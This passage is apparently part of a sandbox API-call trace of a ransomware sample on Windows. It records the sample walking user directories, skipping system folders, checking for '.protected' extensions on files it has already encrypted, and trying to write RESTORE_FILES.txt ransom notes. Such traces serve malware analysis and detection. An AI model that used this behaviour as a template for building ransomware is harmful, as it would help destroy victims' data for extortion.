lpFindFileData=0x295ecb0) returned 0 [0093.194] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.194] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\RESTORE_FILES.txt") returned 70 [0093.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\network\\connections\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.194] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.194] lstrcmpiW (lpString1="Downloader", lpString2="Windows") returned -1 [0093.194] lstrcmpiW (lpString1="Downloader", lpString2="Program Files") returned -1 [0093.194] lstrcmpiW (lpString1="Downloader", lpString2="Program Files (x86)") returned -1 [0093.194] lstrcmpiW (lpString1="Downloader", lpString2="$Recycle.bin") returned 1 [0093.194] lstrcmpiW (lpString1="Downloader", lpString2="System Volume Information") returned -1 [0093.194] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader") returned 51 [0093.194] lstrcmpW (lpString1="Downloader", lpString2=".") returned 1 [0093.194] lstrcmpW (lpString1="Downloader", lpString2="..") returned 1 [0093.194] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*") returned 53 [0093.194] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.194] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.194] lstrcmpiW (lpString1=".", 
lpString2="Program Files") returned -1 [0093.194] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.194] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.194] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.194] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\.") returned 53 [0093.194] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.194] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.194] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.194] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.194] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.195] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.195] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.195] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\..") returned 54 [0093.195] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.195] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.195] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.195] lstrcmpiW (lpString1="qmgr0.dat.protected", lpString2="Windows") returned -1 [0093.195] lstrcmpiW (lpString1="qmgr0.dat.protected", lpString2="Program Files") returned 1 [0093.195] lstrcmpiW (lpString1="qmgr0.dat.protected", lpString2="Program Files (x86)") returned 1 [0093.195] lstrcmpiW (lpString1="qmgr0.dat.protected", lpString2="$Recycle.bin") returned 1 [0093.195] lstrcmpiW (lpString1="qmgr0.dat.protected", lpString2="System Volume Information") returned -1 [0093.195] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat.protected") returned 71 [0093.195] StrStrIW (lpFirst="qmgr0.dat.protected", lpSrch=".protected") returned=".protected" [0093.195] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.195] lstrcmpiW (lpString1="qmgr1.dat.protected", lpString2="Windows") returned -1 [0093.195] lstrcmpiW (lpString1="qmgr1.dat.protected", lpString2="Program Files") returned 1 [0093.195] lstrcmpiW (lpString1="qmgr1.dat.protected", lpString2="Program Files (x86)") returned 1 [0093.195] lstrcmpiW (lpString1="qmgr1.dat.protected", lpString2="$Recycle.bin") returned 1 [0093.195] lstrcmpiW (lpString1="qmgr1.dat.protected", lpString2="System Volume Information") returned -1 [0093.195] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat.protected") returned 71 [0093.195] StrStrIW (lpFirst="qmgr1.dat.protected", lpSrch=".protected") returned=".protected" [0093.195] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.195] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.195] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.195] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.195] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.195] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.195] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\RESTORE_FILES.txt") returned 69 [0093.195] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.195] lstrcmpW (lpString1="RESTORE_FILES.txt", 
lpString2="RESTORE_FILES.txt") returned 0 [0093.195] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.195] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.196] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\RESTORE_FILES.txt") returned 69 [0093.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.196] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.196] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.196] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.196] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.196] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.196] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.196] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\RESTORE_FILES.txt") returned 58 [0093.196] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.196] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.196] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.196] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.196] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\RESTORE_FILES.txt") returned 58 [0093.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\network\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.197] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.197] lstrcmpiW (lpString1="OFFICE", lpString2="Windows") returned -1 [0093.197] lstrcmpiW (lpString1="OFFICE", lpString2="Program Files") returned -1 [0093.197] lstrcmpiW (lpString1="OFFICE", lpString2="Program Files (x86)") returned -1 [0093.197] lstrcmpiW (lpString1="OFFICE", lpString2="$Recycle.bin") returned 1 [0093.197] lstrcmpiW (lpString1="OFFICE", lpString2="System Volume Information") returned -1 [0093.198] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE") returned 39 [0093.198] lstrcmpW (lpString1="OFFICE", lpString2=".") returned 1 [0093.198] lstrcmpW (lpString1="OFFICE", lpString2="..") returned 1 [0093.198] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*") returned 41 [0093.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.198] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.198] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.198] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.198] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.198] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 
[0093.198] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\.") returned 41 [0093.198] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.198] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.198] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.198] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.198] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.198] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.198] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.198] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\..") returned 42 [0093.198] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.198] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.198] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.198] lstrcmpiW (lpString1="AssetLibrary.ico.protected", lpString2="Windows") returned -1 [0093.198] lstrcmpiW (lpString1="AssetLibrary.ico.protected", lpString2="Program Files") returned -1 [0093.198] lstrcmpiW (lpString1="AssetLibrary.ico.protected", lpString2="Program Files (x86)") returned -1 [0093.198] lstrcmpiW (lpString1="AssetLibrary.ico.protected", lpString2="$Recycle.bin") returned 1 [0093.198] lstrcmpiW (lpString1="AssetLibrary.ico.protected", lpString2="System Volume Information") returned -1 [0093.198] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico.protected") returned 66 [0093.198] StrStrIW (lpFirst="AssetLibrary.ico.protected", lpSrch=".protected") returned=".protected" [0093.198] FindNextFileW (in: hFindFile=0x47b9d0, 
lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.198] lstrcmpiW (lpString1="DocumentRepository.ico.protected", lpString2="Windows") returned -1 [0093.199] lstrcmpiW (lpString1="DocumentRepository.ico.protected", lpString2="Program Files") returned -1 [0093.199] lstrcmpiW (lpString1="DocumentRepository.ico.protected", lpString2="Program Files (x86)") returned -1 [0093.199] lstrcmpiW (lpString1="DocumentRepository.ico.protected", lpString2="$Recycle.bin") returned 1 [0093.199] lstrcmpiW (lpString1="DocumentRepository.ico.protected", lpString2="System Volume Information") returned -1 [0093.199] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico.protected") returned 72 [0093.199] StrStrIW (lpFirst="DocumentRepository.ico.protected", lpSrch=".protected") returned=".protected" [0093.199] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.199] lstrcmpiW (lpString1="MySharePoints.ico.protected", lpString2="Windows") returned -1 [0093.199] lstrcmpiW (lpString1="MySharePoints.ico.protected", lpString2="Program Files") returned -1 [0093.199] lstrcmpiW (lpString1="MySharePoints.ico.protected", lpString2="Program Files (x86)") returned -1 [0093.199] lstrcmpiW (lpString1="MySharePoints.ico.protected", lpString2="$Recycle.bin") returned 1 [0093.199] lstrcmpiW (lpString1="MySharePoints.ico.protected", lpString2="System Volume Information") returned -1 [0093.199] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico.protected") returned 67 [0093.199] StrStrIW (lpFirst="MySharePoints.ico.protected", lpSrch=".protected") returned=".protected" [0093.199] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.199] lstrcmpiW 
(lpString1="MySite.ico.protected", lpString2="Windows") returned -1 [0093.199] lstrcmpiW (lpString1="MySite.ico.protected", lpString2="Program Files") returned -1 [0093.199] lstrcmpiW (lpString1="MySite.ico.protected", lpString2="Program Files (x86)") returned -1 [0093.199] lstrcmpiW (lpString1="MySite.ico.protected", lpString2="$Recycle.bin") returned 1 [0093.199] lstrcmpiW (lpString1="MySite.ico.protected", lpString2="System Volume Information") returned -1 [0093.199] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\MySite.ico.protected") returned 60 [0093.199] StrStrIW (lpFirst="MySite.ico.protected", lpSrch=".protected") returned=".protected" [0093.199] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.199] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.199] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.199] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.199] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.199] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.199] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\RESTORE_FILES.txt") returned 57 [0093.199] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.199] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.199] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.199] lstrcmpiW (lpString1="SharePointPortalSite.ico.protected", lpString2="Windows") returned -1 [0093.199] lstrcmpiW (lpString1="SharePointPortalSite.ico.protected", lpString2="Program Files") returned 
1 [0093.199] lstrcmpiW (lpString1="SharePointPortalSite.ico.protected", lpString2="Program Files (x86)") returned 1 [0093.199] lstrcmpiW (lpString1="SharePointPortalSite.ico.protected", lpString2="$Recycle.bin") returned 1 [0093.199] lstrcmpiW (lpString1="SharePointPortalSite.ico.protected", lpString2="System Volume Information") returned -1 [0093.199] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico.protected") returned 74 [0093.199] StrStrIW (lpFirst="SharePointPortalSite.ico.protected", lpSrch=".protected") returned=".protected" [0093.199] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.199] lstrcmpiW (lpString1="SharePointTeamSite.ico.protected", lpString2="Windows") returned -1 [0093.199] lstrcmpiW (lpString1="SharePointTeamSite.ico.protected", lpString2="Program Files") returned 1 [0093.199] lstrcmpiW (lpString1="SharePointTeamSite.ico.protected", lpString2="Program Files (x86)") returned 1 [0093.199] lstrcmpiW (lpString1="SharePointTeamSite.ico.protected", lpString2="$Recycle.bin") returned 1 [0093.199] lstrcmpiW (lpString1="SharePointTeamSite.ico.protected", lpString2="System Volume Information") returned -1 [0093.199] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico.protected") returned 72 [0093.199] StrStrIW (lpFirst="SharePointTeamSite.ico.protected", lpSrch=".protected") returned=".protected" [0093.199] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.200] lstrcmpiW (lpString1="UICaptions", lpString2="Windows") returned -1 [0093.200] lstrcmpiW (lpString1="UICaptions", lpString2="Program Files") returned 1 [0093.200] lstrcmpiW (lpString1="UICaptions", lpString2="Program Files (x86)") returned 1 [0093.200] lstrcmpiW 
(lpString1="UICaptions", lpString2="$Recycle.bin") returned 1 [0093.200] lstrcmpiW (lpString1="UICaptions", lpString2="System Volume Information") returned 1 [0093.200] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions") returned 50 [0093.200] lstrcmpW (lpString1="UICaptions", lpString2=".") returned 1 [0093.200] lstrcmpW (lpString1="UICaptions", lpString2="..") returned 1 [0093.200] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\*") returned 52 [0093.200] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.200] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.200] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.200] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.200] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.200] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.200] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\.") returned 52 [0093.200] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.200] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.201] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.201] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.201] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.201] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.201] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.201] wnsprintfW (in: pszDest=0x4bfb20, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\..") returned 53 [0093.201] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.201] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.201] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.201] lstrcmpiW (lpString1="1036", lpString2="Windows") returned -1 [0093.201] lstrcmpiW (lpString1="1036", lpString2="Program Files") returned -1 [0093.201] lstrcmpiW (lpString1="1036", lpString2="Program Files (x86)") returned -1 [0093.201] lstrcmpiW (lpString1="1036", lpString2="$Recycle.bin") returned 1 [0093.201] lstrcmpiW (lpString1="1036", lpString2="System Volume Information") returned -1 [0093.201] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036") returned 55 [0093.201] lstrcmpW (lpString1="1036", lpString2=".") returned 1 [0093.201] lstrcmpW (lpString1="1036", lpString2="..") returned 1 [0093.201] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\*") returned 57 [0093.201] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.201] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.201] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.201] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.202] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.202] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.202] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\.") returned 
57 [0093.202] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.202] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.202] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.202] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.202] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.202] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.202] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.202] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\..") returned 58 [0093.202] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.202] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.202] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.202] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.202] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.202] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.202] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.202] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.202] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll.protected") returned 86 [0093.202] StrStrIW (lpFirst="ENVELOPR.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.202] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.202] lstrcmpiW 
(lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.202] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.202] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.202] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.202] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.202] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll.protected") returned 86 [0093.202] StrStrIW (lpFirst="GRINTL32.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.202] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.202] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.202] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.202] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.202] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.203] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.203] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll.protected") returned 87 [0093.203] StrStrIW (lpFirst="GRINTL32.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.203] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.203] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="Windows") 
returned -1 [0093.203] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.203] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.203] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.203] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.203] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll.protected") returned 83 [0093.203] StrStrIW (lpFirst="MAPIR.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.203] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.203] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.203] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.203] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.203] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.203] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.203] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll.protected") returned 86 [0093.203] StrStrIW 